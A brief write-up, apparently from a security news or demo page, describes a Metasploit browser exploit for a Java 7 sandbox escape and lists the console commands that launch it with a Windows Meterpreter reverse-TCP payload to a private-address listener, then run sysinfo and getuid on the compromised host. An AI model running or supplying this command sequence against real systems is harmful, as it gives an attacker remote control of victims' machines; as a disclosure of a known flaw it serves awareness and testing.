This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is now patch from Oracle [Java 7 Update 7 release]. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms.
Metasploit demo:
use exploit/multi/browser/java_jre17_exec set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid